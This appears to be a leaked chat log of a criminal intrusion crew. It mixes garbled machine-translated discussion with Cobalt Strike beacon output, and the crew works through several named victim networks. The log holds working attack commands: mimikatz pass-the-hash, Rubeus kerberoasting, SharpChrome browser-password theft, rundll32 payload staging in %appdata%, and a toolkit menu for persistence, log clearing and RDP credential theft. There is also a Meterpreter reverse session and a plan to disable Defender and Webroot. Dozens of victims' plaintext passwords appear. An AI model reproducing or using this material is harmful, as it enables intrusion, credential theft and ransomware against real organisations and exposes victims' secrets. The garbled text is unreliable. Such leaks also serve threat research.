OK Z: \\192.168.1.187\c$ Microsoft Windows Network
The command completed successfully.
```
```
OK R: \\HQ316.MissMe.local\D$ Microsoft Windows Network
OK S: \\HQ601.MissMe.local\E$ Microsoft Windows Network
OK T: \\HQ288.MissMe.local\D$ Microsoft Windows Network
OK U: \\HQ402.MissMe.local\E$ Microsoft Windows Network
OK V: \\HQ602.MissMe.local\C$ Microsoft Windows Network
OK W: \\HQ231.MissMe.local\C$ Microsoft Windows Network
OK X: \\192.168.1.39\C$ Microsoft Windows Network
Disconnected Y: \\192.168.1.82$ Microsoft Windows Network
Disconnected Z: \\192.168.1.182$ Microsoft Windows Network
```
```
\\HQ231.MissMe.local\C$ - Default share
\\MissMe.local\D$ - Default share
\\HQ345.MissMe.local\C$ - Default share
\\HQ602.MissMe.local\C$ - Default share
\\HQ402.MissMe.local\E$ - Default share
\\HQ402.MissMe.local\G$ - Default share
\\HQ402.MissMe.local\H$ - Default share
\\HQ288.MissMe.local\D$ - Default share
\\HQ266.MissMe.local\C$ - Default share
\\HQ601.MissMe.local\E$ - Default share
\\HQ316.MissMe.local\D$ - Default share
```
```
\\Hannah-HP.MissMe.local\C$ - Default share
\\Hannah-HP.MissMe.local\EmailFS -
\\HQ329.MissMe.local\C$ - Default share
\\HQ329.MissMe.local\D$ - Default share
\\KPNWH015.MissMe.local$ - Default share
\\HQ125.MissMe.local $ - Default share
\\H332.MissMe.local\C$ - Default share
\\H332.MissMe.local\D$ - Default share
\\HQ232.MissMe.local\C$ - Default share
\\HQ352.MissMe.local\C$ - Default share
\\HQ352.MissMe.local\D$ - Default share
\\HQ339.MissMe.local\C$ - Default share
\\HQ312.MissMe.local\C$ - Default share
\\HQ312.MissMe.local\D$ - Default share
\\HQ337.MissMe.local\C$ - Default share
\\HQ603.MissMe.local\C$ - Default share
\\HQ603.MissMe.local\E$ - Default share
\\MMSP-SVR.MissMe.local\C$ - Default share
\\MMSP-SVR.MissMe.local\E$ - Default share
\\MMSP-SVR.MissMe.local\InstallCD -
\\HQ405.MissMe.local\A$ - Default share
\\HQ405.MissMe.local\C$ - Default share
\\HQ405.MissMe.local\F$ - Default share
\\HQ405.MissMe.local\Public -
\\HQ405.MissMe.local\UPS -
\\HQ405.MissMe.local\Users -
`````` \DNM-WH.MissMe.local\D$ - Default share \DNM-WH.MissMe.local/Users - \\{\HQ341.MissMe.local\C$ - Default share \\{\HQ330.MissMe.local\C$ - Default share \\{\HQ330.MissMe.local\D$ - Default share \\{\HQ331.MissMe.local\C$ - Default share \\{\HQ331.MissMe.local\D$ - Default share \\{\HQ217.MissMe.local\C$ - Default share \\{\HQ325.MissMe.local\C$ - Default share \\{\HQ325.MissMe.local\D$ - Default share \\{\HQ325.MissMe.local\F$ - Default share \\{\HQ325.MissMe.local\G$ - Default share \\{\HQ325.MissMe.local\H$ - Default share \HQ325.MissMe.local\J$ - Default share \\{\HQ276.MissMe.local\C$ - Default share \\{\HQ342.MissMe.local\C$ - Default share \\{\HQ401.MissMe.local\C$ - Default share \\{\HQT018.MissMe.local\C$ - Default share \\{\Hannah-HP.MissMe.local\B$ - Default share `````` \\{\HQ334.MissMe.local\C$ - Default share \\{\HQ298.MissMe.local\C$ - Default share \\{\HQ308.MissMe.local\C$ - Default share \\{\HQ299.MissMe.local\C$ - Default share \\{\HQ404.MissMe.local\C$ - Default share \HQ404.MissMe.local\CommitCRM - \HQ404.MissMe.local/UPS_Shared - \HQT014.MissMe.local\C$ - Default share \\{\HQ403.MissMe.local\C$ - Default share \\{\HQ403.MissMe.local\E$ - Default share \\{\HQ343.MissMe.local\C$ - Default share \\{\HQ351.MissMe.local\C$ - Default share \\{\HQ126.MissMe.local\C$ - Default share \\{\HQ282.MissMe.local\C$ - Default share \\{\DNM-WH.MissMe.local\C$ - Default share ````MISSME\Administrator mcmiss07!`@user9 ``` Pinging HQ404.MissMe.local [192.168.1.49] with 32 bytes of data: Pinging HQ231.MissMe.local [192.168.1.84] with 32 bytes of data: Pinging HQ403.MissMe.local [192.168.1.44] with 32 bytes of data: Pinging HQ282.MissMe.local [192.168.1.134] with 32 bytes of data: Pinging HANNAH-HP.MissMe.local [192.168.1.86] with 32 bytes of data: Pinging DNM-WH.MissMe.local [192.168.1.124] with 32 bytes of data: Pinging HQ325.MissMe.local [192.168.1.184] with 32 bytes of data: Pinging HQ329.MissMe.local [192.168.1.16] with 32 bytes of data: Pinging 
HQ330.MissMe.local [192.168.1.37] with 32 bytes of data: Pinging HQ331.MissMe.local [192.168.1.54] with 32 bytes of data: ``@user8 ``` Pinging HQ603.MissMe.local [192.168.1.186] with 32 bytes of data: Pinging HQ401.MissMe.local [192.168.1.71] with 32 bytes of data: Pinging MCPC.MissMe.local [192.168.1.21] with 32 bytes of data: Pinging UPS-FEDEX.MissMe.local [192.168.1.209] with 32 bytes of data: Pinging HQ232.MissMe.local [192.168.1.70] with 32 bytes of data: Pinging HQ259.MissMe.local [192.168.1.55] with 32 bytes of data: Pinging HQ293.MissMe.local [192.168.1.50] with 32 bytes of data: Pinging HQ266.MissMe.local [192.168.1.36] with 32 bytes of data: Pinging HQ190.MissMe.local [192.168.1.33] with 32 bytes of data: Pinging HQ405.MissMe.local [192.168.1.169] with 32 bytes of data: ``@user4 ``` Pinging HQ126.MissMe.local [192.168.1.34] with 32 bytes of data: Pinging HQ306.MissMe.local [192.168.1.30] with 32 bytes of data: Pinging HQ601.MissMe.local [192.168.1.187] with 32 bytes of data: Pinging HQ288.MissMe.local [192.168.1.35] with 32 bytes of data: Pinging HQ602.MissMe.local [192.168.1.74] with 32 bytes of data: Pinging HQ280.MissMe.local [192.168.3.57] with 32 bytes of data: Pinging HQ228.MissMe.local [192.168.1.41] with 32 bytes of data: Pinging HQ316.MissMe.local [192.168.3.51] with 32 bytes of data: Pinging HQ217.MissMe.local [192.168.1.149] with 32 bytes of data: Pinging HQ298.MissMe.local [192.168.1.47] with 32 bytes of data: ``@user3 ``` Pinging HQ296.MissMe.local [192.168.1.65] with 32 bytes of data: Pinging HQ277.MissMe.local [192.168.3.58] with 32 bytes of data: Pinging HQ276.MissMe.local [192.168.1.20] with 32 bytes of data: Pinging HQ147.MissMe.local [192.168.1.94] with 32 bytes of data: Pinging HQ308.MissMe.local [192.168.1.32] with 32 bytes of data: Pinging HQ201.MissMe.local [192.168.1.16] with 32 bytes of data: Pinging KPNWH015.MissMe.local [192.168.1.19] with 32 bytes of data: Pinging HQ312.MissMe.local [192.168.1.183] with 32 bytes of data: 
there is no need to write or discuss yourself immediately tell me the strategy to work well and let's count on it all servaks are real - virtualization is not toned down like only outlook and poppy backyatmalovato servers however) stat at the moment cars - 344 of them servers - 10 (9 alive 1 unavailable) armors on the wind - 256 (now otpiguyut and opisu how many available) user9user4user3 if it does not work @tl2 said not to mess with appleslashtormg well korbel now close and ask the guys to help, if something is missing I have not so much clears, have tried with hash passwords?all yes and all the LA from the servers tried brutal passwords yes to the account Admin? without domain@tl2 can try to brutalize accounts yes there? on vg nothing (no? Good night, get it? ok tomorrow a lot of work, maybe we'll close from scratchKopal cpcc.edu no result. I have set up a vps, tomorrow I will bring everything up. I searched all over my surfboard and did not find any files and folders and just in case I had to roll out the os again.Pinged all that is pinged from the AD and scanned the balls on the pinged machines (in the conf. skipped). Coba and empire sessions don't go up. i have already got the kit ready and wanted to try it then try psh empire`https://ucfapps.cloud.com/citrix/storeweb/`. it worked in it, the data does not get everything, no way to run the exe, in ptsh only managed to pull the server, and that with its fucked up, in the coba is not pulled, I think about how to separate further, tomorrow I will try something else?
2 vps configured completely on the list 3 now in progress, here is the final stage, the empire is in conflict made a template guide on how to configure 1 wpc given to @user3 1 is ready to be given away 1 will soon be ready to be given upafter tomorrow I expect you at 12:00 a.m. in 12 minutes at homewrite me the result of your work todaytake it there msf and psh empirethank you I'll give you 3 debiannaw what do you likecaw@user8 you like lincus? got it this weekend they brought a new one, I will move to it, this began to often hang up another computer? I will now install another computerthere I @user7? @user9 got sick @user3 is late Where is everybody today? Not many of you...then I'll give you a new one. I don't know what to do with this grid. there was also `healthcare.com`, but there, according to your arguments, got burned (nothing ran, no google chrome, no kmd, no psh) in `unf.edu`, worked with it for a while and at one point the citrix credentials have changed, nothing yet? and now what about the tasks?[ ](https://mediaeveryone.com/channel/general?msg=Qdo9AtdEjZuyY5et4) you wrote that I have on my tasks kovyvayu asu.So what do you have on the tasks? and well)yes norms)well, how did you rest? 
inside ad infos, hashes, creds.txt etc ``` ``` And another thing, since the report will be an archive, next to the ad_*.txt files you make a file creds.txt in which DCs DA EA LA cleartext creds if there are any ``If there are any, delete it: ``` include(script_resource("modules/insleep.cna")); `````` popup beacon_bottom { menu "TW-toolkit"{ include(script_resource("modules/checkvm.cna")); include(script_resource("modules/clearev.cna")); include(script_resource("modules/FireWall.cna")); include(script_resource("modules/persistence.cna")); include(script_resource("modules/RDP.cna")); include(script_resource("modules/Win2012mimikatz.cna")); include(script_resource("modules/cmd.cna")); include(script_resource("modules/sleep.cna")); include(script_resource("rdpthief/RdpThief.cna")); include(script_resource("modules/collect.cna")); include(script_resource("modules/chrome.cna")); } } ``Only here or only here? Do you in the cobas also arrives? +, one left ... tense for the future, remove this plugin already removes sessions more than 1 minute asphyxiation just servak where YES for a long time or did not go at alla then seshchka offnut and all take a place on any server `` `` nitial beacon from SYSTEM *@192.168.1.7 (DC-01) ``Why the slip? go to the server 1 team yes, already working with him, the second has just configured, accesses are distributed there slip put while I sort the files is mineThose in the general cob?+while we can re-sort what we got and msf to configure)))) it's not even the server? no sessions left at all? + well bnpmedia.com exactly + all fell off? dom.helpathome.com so in total, what is in work now? sort what we got earlier, then the rest are busy?only FRIVER.LOCAL is up and running now?[ ](https://mediaeveryone.com/channel/general?msg=vvBvMwABd6JENGyrv) what domain? 
FRIVER.LOCAL-+DIV420-4G350W2 (FRIVER.LOCAL)write down what online remained1minute+failed sessionTell me in sootvetstvennoy conf confine to throw allvatitoki write to confine from where hashine the fact kst that this local user no yuz all easierspawnas jump etc can be from other errors in the process check through the net use `` AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:15:59> spawnas .\Administrator Shotgun913 https [*] Tasked beacon to spawn windows/beacon_https/reverse_https (regbest.com:443) as .\Administrator [+] host called home, sent: 261167 bytes [-] could not run C:\WINDOWS\system32\mstsc.exe as .\Administrator: 1326 Kernels look different so it's hashes) ah, I also uploaded kernels and there was also an admin who uploaded hash above...what to whom7 it's to whom? `` [*] Dumping password hashes... ``and then commands like this wdigest tspkg kerberos ssp livessp hashdump ``use mimikatz possible mimik to pullenum_utnand try to remove the module kobaThen the session does not fly in koboltot write while the results of the work in their confumb will be in the hash DAokey) now pour the case and will continue to search) yesEto the fact you pulled the server?well, okay) there is a matter of taste)He mne like my brother, we are
with him from the first version together)))) or something like thatArmitage -View - TableDon't make the default awful in arma, by default a terrible viewkrtatysl shot out of turnsuzal msf for smb_login from his computer, will die?if no more local connects you can continue to work operatively)already just a session on the vpc and disconnect it good for you that you have made a breakthroughperfectly make the connection that you have received to pull? on these vpc why? yes you and said that deployed msfnahera i gave vpc under msf? question i drink somethingDo you also pulled on your pc before that?kzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzznmDa through a proxy. We didn't do it any other way. Through armitage did but it needs a session Seriously on your pc pulled or what? I'm through a proxy bindomili real shot? on the VPS? And seriously? Definitely shot on his own pbut do not say that on his pc pulled through?) and for `` For? [*] Meterpreter session 1 opened (0.0.0.0:0 -> 185.150.190.204:2103) at 2020-10-06 23:07:43 +0300 ``I didn't look at it that way, but there are no strange groups))) thanks for the tip at least someone checked it out) no have you checked it out? but in ad users ivan has member_of strage_users and your username DOMAIN\ivan what you have in LA it says DOMAIN\strange_uesser I'm talking to the localgroup Administrators or do you analyze the groups and look for the current user in the list? )))))))) by DOMAIN\uesser how do you determine LA? 
ok if you find something I will throw here in an hour, only in brute force will go to[ ](https://mediaeveryone.com/channel/general?msg=W4apDrxrep52uAxre) nice to hear that) yes-I think the system will soon pass too, right?we don't have any LA inputs from the current live sessions?+I hope everyone heard and all made notes on this point understood, a little later with grandfather check citrixnothing on your pc you do not deploy, do not connect, do not establish a connection, for this you all issued you or very poorly documented, or lazy to look or ask the guys stop if you through yourself soks put, you can and msf sessions to pull on themselves, why vpc gave out rdp, browsers, etc. and i said that i should work on the network through vpc proxies why do we need a winDoc you had a question if you remember everything is ok, i did not hook up I wrote a long time ago you wanted a citrix proxy hook up made in kobe do not say that from your PC you go to the network in foxecacom browsers and what proxies?I delete files immediately it's because of proxies that I prescribed in the browserAll he develops and chat))) well I read or understand it wrongWhy? He has a rocket chat hung up and he can not respond Well, how can he drop out of the chat and because of this in what question? What exactly he scans through a VPN? And how is it related? he scans for 17-10 mb that will fall out. and @user7 normal? oh, that's the first one I spammed and he just hung up) Dak I dunno) I do not remember that there would be something to do) So I clarify the grid for @user7 and you help him, I just asked whether you left the file or not) and @user7? and I worked there? I do not mind, but it hangs. file or left there? 
strange that you) someone is directly rushing to me)))))
I understand that it didn't come back, help user7@user3 didn't get to YES? in process--didn't get up to systems yet? or yes? i say ok or no after startup, you can't start it1 startup and all one time my cob session + start working ``` dom.helpathome.com ``so this dampon did not say what, just said that he broke through svoitom how come back can you ask it? ``kiwi_cms'')) to the toilet where? he went out, do not ask (kiwi? svoitom what method? and all have tried his method?somewhere other than the grid @user3 were the rights systems? judging by the name of the polzak may well be LA@user3 can help so far others took the session but have not yet checked because the sessions are falling off - looking for a less stable processThis is not enough! there were promises that the fuck it will be no free @user9 @user1 how are you doing?
within an hour can come back as usual wait an hour there are 2 new sessions in the input cobaFailed skavot and do not see the vpn on and the pc is not in the domain at all how is the connection going to another name?how can I get a hellfind and still not find my machine?.immediately here is the name of the confabdisassembled in the coba came dead and new and then the questions, kerbs and other stuff is the scriptthe first message in the confab - DA, EA, LA, DC, ad infoDo yourself tutorial on "got the first session "What are you talking about?guys, honestly fucked repeating FIRST MESSAGE IN CONFECH SESSIONS back? in an hour will not arrive will be assigned to a couple on the current you from half an hour to an hour if it comes right away will notify let one of their monitors kobutozhe right, while waiting can help colleagues answer questions okay, while waiting bad (you said there was half a gig of information have you not archived?or there's a piece of AD info left there? what did you manage to remove? @user1 also wait mb will returndalf@user3 yours arrived? well, yes) so we took exactly the server segment and separated from it subsnets /24 /16subsnets not everything speaks the truth) but subsnets `>cn: 172.I have no trusts. is that normal? + now i will download everything and start 2? 3 people so far, what about dll launches?awaiting the groupbos ask yes@tl1 chetu.com i work feedback on dll, yes)give me a name, i will create a confab and give dlltoday i will definitely "live" network)who has a kilometer network, hands and head will not be redundantOkJdu if it does not come will work in parezhdy while you still 20 minutes it fell off do not see that he wrote it off here?I have noSession he hasWhat do you mean not distributed yet? 
Or yesterday's maybe now come catching in the first cobaSad means a lot of information)now maybe reopen1 to 1 noThere will be more sessions? the main thing is not too much noise the bigger the network the easier to work in it)fell off ska!@tl1 took ad_users not yet - is this normal grid? @tl1Povisley((((
@user4 silence@user7 took the session 2 more? and then suddenly on the desktop....)in the conf conf, before running the dll, write down where you putDo you run through the shell rundll32 so with , comma exactly need? so, I give 1 dll in the conf, on 1 pc run. criteria: -hide it away in user folders (in %appdata%) a few levels deep and mask the name as synonymous with those where you put -Run it like this `rundll32 FULL_PATH_THE_DOLL\IMA.dll, entryPoint` -Check that it hasn't deleted -write in conf that you run and check the source file ``. execute-assembly /SharpChrome.exe logins /showall ``+looks like normal 4 two see Done Capture as user9 in the sweatshop has already said so fucking much + in the input cobbler only @user9 confirmed + waiting + in the input cobbler who has the network "checked" farther differently, one again cmd off, the second has 3 pc for analysis @user7 already 3 input sessions)Domain ad.happay.what on AD?
beacon> execute-assembly /home/user/tools/ShWeb/SharpWeb.exe all [*] Tasked beacon to run .NET program: SharpWeb.exe all [+] host called home, sent: 705073 bytes [+] received output: === Chrome (Current User) === [+] received output: [X] Exception: The parameter is incorrect. === Checking for Firefox (Current User) === === Checking Windows Vaults === [-] Invoke_3 on EntryPoint failed. `````` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all [*] Tasked beacon to run .NET program: SharpWeb.exe all [+] host called home, sent: 705073 bytes [+] received output: === Chrome (Current User) === [X] Exception: The parameter is incorrect. === Checking for Firefox (Current User) === === Checking Windows Vaults === [-] Invoke_3 on EntryPoint failed. No rights in the conhost and swhost I can't get in. ``` adazure.app Administrator dhcpadmin.app joomlatest1 joomlatest2 kassabp kassabp.adm macmainw macmainw.adm Nagelr.adm scriptadm.app Troysec.adm usanet.adm ``Yeah, take off sharpwebfirefox the process list and adne thick`` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpChrome.exe logins /showall --- Chrome Credential (Path: C:\Users\forstern\AppData\Local\Google\Chrome\User Data\Default\Login Data) --- file_path,signon_realm,origin_url,date_created,times_used,username,password C:\Users\forstern\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://editor.vev.design/,https://editor.vev.design/login,9/2/2020 4:11:19 PM,13243551079155078,,Piper16! ``as soon as you check immediately + in the noteproverifybnpmedia.com I also check the rest? without confirmation only 3 users noteFRIVER.LOCAL there is one more appearedvip.pet write here the domain to which to create confona works and glorovnodavshego to salaku what to do in there should not work? 
works as a tip `` `` shell net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators ``Can you give us a session?`` Try dotnet brute force or smb login no no it didn't work.``The point of smb through smb_login?`` And what about brute force? beacon> execute-assembly /home/omar/Desktop/Fast-Guide/Net-GPPPassword.exe [*] Tasked beacon to run .NET program: Net-GPPPassword.exe [+] host called home, sent: 114731 bytes [+] received output: Processing files in \GPJ.LOC\sysvol\GPJ.LOC\policies\ ``` I can't get an error, but there's no result, nothing happens. elevate seems to work SharpUp says - yes, guys, the user is a local admin, you can bypass yuacni Net-GPPPassword and winpis won't show it to gpj and won't let it in. such pies what haven't tried before now guys try everything from gostpack they don't workvatson shows two vulnerabilitiesrubeus and kerberost doesn't accept domain specified both gpj and gpj.I've tried with Semen to run a brute force attack with sharpshrome, it blames on the domain. what's the problem now?[ ](https://mediaeveryone.com/channel/general?msg=9jNJDKiXxwpxapwMa) eto ne taketo so progress? 1) Domain Admins. 2) Enterprise Admins 3) Local Admins 4) Ad Info execute-assembly /Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt ``https://habr.com/ru/company/pt/blog/423903/выводит help does not work with parameter ``kerberoast```` execute-assembly /Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt ``` Dumps all crb hashes, analog of script on ps`31d6cfe0d16ae931b73c59d7e0c089c0` is an empty string, remember! there are no users in AD with such a password, if you see such a ps, then the account is not workingsocreate to telnet,ssh,web,mssql,smb,rdp,vnc`ports 1-1024,3389,5900-6000` why scan such a range? there are 900 empty ports and no mssql? 
[02]: Fortinet SSL VPN Virtual Ethernet Adapter Connection Name: Ethernet 3 DHCP Enabled: No IP address(es) [01]: 10.59.12.209 [02]: fe80::89c3:6e80:ed9e:ca27 `````` The VPN seemed to be active ``` If his process just hangs there, it does not mean that it is active) ok. will appear - let's try the same as in the classic with cisco clients in generalvpn, I think, was active or LDAP tied there or through the RADIUS is authorizedWe kind of just discussed this point with Fortigate client, the point is that connecting through the Wpn via Fortigate client through the "domain" creeds occurs and connect the machine to the domainTo see the domainConnect through wpn@tl1 , while there is time, can you tell me how to be in the network matches? I can not see the DC there. Any thoughts on this? (ICMP) Target '172.16.200.1' is alive. [read 8 bytes] [+] received output: 172.16.200.1:139 172.16.200.1:135 [+] received output: 172.16.200.1:445 ``. And if they're also pinged, they're the ones you should be aiming at ``. beacon> run net use * "\192.168.168.10\Shares" /persistent:no /user:PKGPROD\jess 0204 [*] Tasked beacon to run: net use * "\192.168.168.10\Shares" /persistent:no /user:PKGPROD\jess 0204 [+] host called home, sent: 92 bytes [+] received output: Drive Z: is now connected to \192.168.168.10\Shares. The command completed successfully. ``Don't bother to think about it)``like if they do it there will be 1.5 pc? but now I do not understand about the packaging in general? read that they were serviced not so readHow did the idea that they could serve someone. I told you above that they were in service with a company that provides a range of IT services including PC maintenance.so? oh fuck)))))) These guys were in the packaging business.were they serviced or serviced? 
wtf ``` tl1 Team Lead 1 @tl1 Admin Owner 02:51 service company for PCs and other things consists of 20 PC's) ``Composed of 20 PCs) a company that provides services to PCs and other wickednessThey were serviced by a company that provides services to PCs and other wickednessNo one sees the forest of domains? And what makes you think that DMX somehow related to them?[ ](https://mediaeveryone.com/group/itc-us-com?msg=Boet2zFtPiCYxiBHP) in hell info 20 PCs, no doubts? AV lab some more than this network, how does it even work and keeps the site?) There was not a hint of itThe subnet look was also the domain DMX ``. .168.5.13:445 [+] received output: 192.168.5.17:445 (platform: 500 version: 6.1 name: KEY2 domain: SAMBA) 192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS) 192.168.5.23:445 192.168.5.24:445 [+] received output: 192.168.5.25:445 192.168.5.26:445 192.168.5.27:445 192.168.5.28:445 192.168.5.30:445 [+] received output: 192.168.5.98:445 (platform: 500 version: 6.1 name: TSLINUX98 domain: WORKGROUP) 192.168.5.117:445 (platform: 500 version: 4.9 name: KEY domain: DMX) [+] received output: 192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS) 192.168.5.188:445 ``1) and there is no guarantee that in another subnet were not the wind hosts from that domain? They are all in another subnet which was not a hint in the one with which they worked, + NN - hydrogenvgworkgroupThat * + N vgshek even in the subnet where were * This domain would NEVER know if we do not suffer the fuck) at least there was another domain + N vgshek even in the subnet where were pkgprod gone to shit?If everything goes fucked up again as in pkgprod tomorrow, we'll have a serious talk with everyone, even if you do everything well and cover all the servers and everything that's online + What's wrong with running it? If we run it in 4, we'll spend half a day here. go to work tomorrow)? 
Tomorrow is a day off))) max 42 hours to start the build if there is a variant go to the new ones anyway, this is a waste of time if 2 hours to search for information2 hours to what? then run us another 2 hours here DOUBLE WINDEF AND START EXECUTION what have we here?[ ](https://mediaeveryone.com/group/itc-us-com?msg=p8XMqsLRzJ3xcFWeu) on one user this error, another user finds :man_shrugging: concluded that this error - nothing was found. get-eventlog "Security" | where {$_.Message -like "*login*" -AND "Source Network Address"} | export-csv C:\windows\temp\user.csv ``So there's an error here on the tula itself.`` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe egl_admin ITC\br_admin CAKE@horse369!@@ [*] Tasked beacon to run .NET program: SharpSniper.exe egl_admin ITC\br_admin CAKE@horse369!@@ [+] host called home, sent: 113785 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe egl_admin ITC\egl_admin E@gle@x1s3030 [*] Tasked beacon to run .NET program: SharpSniper.exe egl_admin ITC\egl_admin E@gle@x1s3030 [+] host called home, sent: 113781 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe johnnyp ITC\br_admin CAKE@horse369!@@ [*] Tasked beacon to run .NET program: SharpSniper.exe johnnyp ITC\br_admin CAKE@horse369!@@ [+] host called home, sent: 113781 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. Try the classic one, but the sniper still does not show up We know that he is logged into some dkou, some he is looking for) when the last logon was last logon And look at net center Try also specifying another user to search for Try and with direct credentials In the last case it worked like that in other networks with a token did it work fine Have you tried with direct credentials? did you test in laba tool? 
just login of the one you're looking for,the syntax on git is like this)user -?`` beacon> pth ITC\br_admin 555601b2d489ec2bfb7d189544736c8b [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:br_admin /domain:ITC /ntlm:555601b2d489ec2bfb7d189544736c8b /run:"%COMSPEC% /c echo 90835b1e435 > \.\pipe\06c1fb" command [+] host called home, sent: 23 bytes [+] host called home, sent: 438863 bytes [+] Impersonated NT AUTHORITY\SYSTEM [+] received output: user : br_admin domain : ITC program : C:\Windows\system32\cmd.exe /c echo 90835b1e435 > \\.\pipe\06c1fb impers. : no NTLM : 555601b2d489ec2bfb7d189544736c8b | PID 28132 | TID 127016 | LSA Process is now R/W | LUID 0 ; 1041160668 (00000000:3e0ed9dc) \_ msv1_0 - data copy @ 0000025C26677D20 : OK ! \kerberos - data copy @ 0000025C279CE058 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 0000025C2CCF4598 (32) -> null beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe egl_admin [*] Tasked beacon to run .NET program: SharpSniper.exe egl_admin [+] host called home, sent: 113725 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. ``with the token.../SharpSniper.exe [User]what do you specify? and how do you look for? well, the sniper looks at the logstipo logs are not written on the dk? >In events on the dk does not write (sharpsniper) in events on the dk does not write (sharpsniper) through powerview only finds it on the rc\dk in ad_computer no computers with hints of admin except one, but he cd not available) and search for admins pc? admins go to rdc, dk on rdp obscure where workstation i had them yesterday still chekatatam computers just with the prefix wsa comps like ITITC-LMAO no why search the servers at all? pc itshnikov empty? 
soobsnabolshe in chrome history on the servers no from a machine `ITCMA-RDS01 ` to av went polzak ` SLEAdmin ` ``` http://anywhere.webrootcloudav.com/zerol/wsasmekevalalpha.exe8 ``` ``` http://downbox.webrootanywhere.com/wsasmeexe/022AENTP19F2B7A74491exe ``` ``` http://anywhere.webrootcloudav.com/zerol/wsasmekevalalpha.exehttp://webrootcloudav.com/ ``[ ](https://mediaeveryone.com/group/itc-us-com?msg=iLMih4xmBT6FFRfGN) I mean the AV, he goes here without a problem, but there's no management, purely logical ``` https://my.vmware.com/ `````` administrator@vsphere.local ``` from vsphere, the password does not fit[ ](https://mediaeveryone.com/group/itc-us-com?msg=NaahsFk2RtTbvzou5) did not log in? and where the access saved? on all servers and more or less technical PCs looked[ ](https://mediaeveryone.com/group/itc-us-com?msg=39MCkb4mf4KJgqGoE) he did not log in from this dk, and in general where he logged in not found anyway check this pathwhy? just confirm adding device+even if the device has already logged in?i don't know how it works with AV muzzles but sim and tv always need the code i think that only when logging in from an unknown place why? if the browser fingerprint is saved or do you think they get the code every time? no? code from a cell phone anvey need it in AV it is not logged in take chrome) and deploy it on the desktop under sopsom i will check if there is a session ``` C:\Users\egl_adminAppData\Local\Google\Chrome\User Data\Default\Login Data,https://my.vmware.com/,https://my.vmware.com/web/vmware/login,7/15/2020 9:05:52 AM,13239291952720834,stevev@egltech.net,B00b00licious ``10.0.0.38 in chrome in the file? dkITCMA-FILE02[ ](https://mediaeveryone.com/group/itc-us-com?msg=nk9CPM5CPDJNBxDwP) they will also fit to vsphere with 90% from where they were taken? 
:zany_face:`` stevev@egltech.net B00b00licious ``` yeah, it's a creds from av, but you need a two-factor there ``` https://my.vmware.com/web/vmware/login stevev@egltech.net B00b00licious ``` oooo this seems to be the mail from either webroot or cloudbucket, hint to all-all-servers [X] Error triaging C:\Users\.NET v4.5\AppData\Roaming\Microsoft\Protect\S-1-5-82-271721585-897601226-2024613209-625570482-296978595\460d0a91-e4b0-4ac8-96bd-413bf84d1909 : Index was out of range. Must be non-negative and less than the size of the collection. Parameter name: startIndex C:\Users\egl_admin\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://itcse12000-manj08bw1e88orb4.dattoweb.com/,https://itcse12000-manj08bw1e88orb4.dattoweb.com/,1/16/2019 11:04:30 AM,13192128270776825,, C:\Users\egl_admin\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.veeam.com/,https://login.veeam.com/,8/8/2019 1:46:59 PM,13209760019353590,, ``` ``` https://my.vmware.com/web/vmware/login stevev@egltech.net B00b00licious ``` ``` http://10.0.0.1/webui/ cisco E7c+z~%g~KnxzsRG ``` ``` http://10.0.0.52:8000/login Administrator 7654321 ``` ``` http://52.44.205.233/login Bradbeers Bradbeers ``` ``` http://52.44.205.233/login itc-operations itc-operations ``` ``` http://10.0.0.38:801/ benr C@KEhorse369! ``` ``` https://auth.ruckuswireless.com/login mderfler@microvisionsinc.com M@keAMYW0rk1 ``` ``` https://remote.itc-us.com/rdweb/pages/en-us/login.aspx ITC\greggh,71mpR$ 8361 rebeccav,RVT!9211 Toddd,Kamejod!21 ``` ``` http://itcma-mits01/,http://itcma-mits01/mitsdiscover/login.md grantc,Fall@2021! greggh,71mpR$ 8361 jamesn,Led$9909 jasonh,fall@ITC2020! jasonh,Trump$2020! ``` ``` http://52.44.205.233/login benjamin-facility benjamin-facility ``` ``` ``The rest of the stuff we're looking for we'll disable the rest by hand on the servers How do we disable the rest? yes only webroot it was theoretically) webroot you wanted to bang through gpotam only windef + webroot? 
disable Windows Defender and hope that Webroot does not flag it at startup?) what to do with the defenses? on ITCMA-RDS-SVR01: BtSystem.Service.exe, DattoBackupAgent.exe, DattoProvider.exe, MsMpEng.exe, WRSA.exe; under a bunch of them on ITCMA-FILE01: DattoBackupAgent.exe, Veeam.EndPoint.Service.exe, Veeam.EndPoint.Tray.exe; on ITCMA-ENG01 found besides WRSA.exe: WRCoreService.x64.exe, WRSkyClient.x64.exe. It's normal, Defender on servers in general is very often disabled. In the processes there is no Defender on some servers, so it doesn't count; then Seatbelt it... yes, the Defender process, MsMpEng.exe? In the tasklists wrsa.exe (Webroot) is visible, then most likely it is clean; try 3-4 random machines and look at the list. Unless the query everywhere said "I did not find anything, do whatever you want, just don't mess up." good afternoon, sorry I did not say hello) *not always accurate. On the dumb ones: Seatbelt's enumeration is not always precise, try edr_qu… on …:
```
====== AntiVirus ======
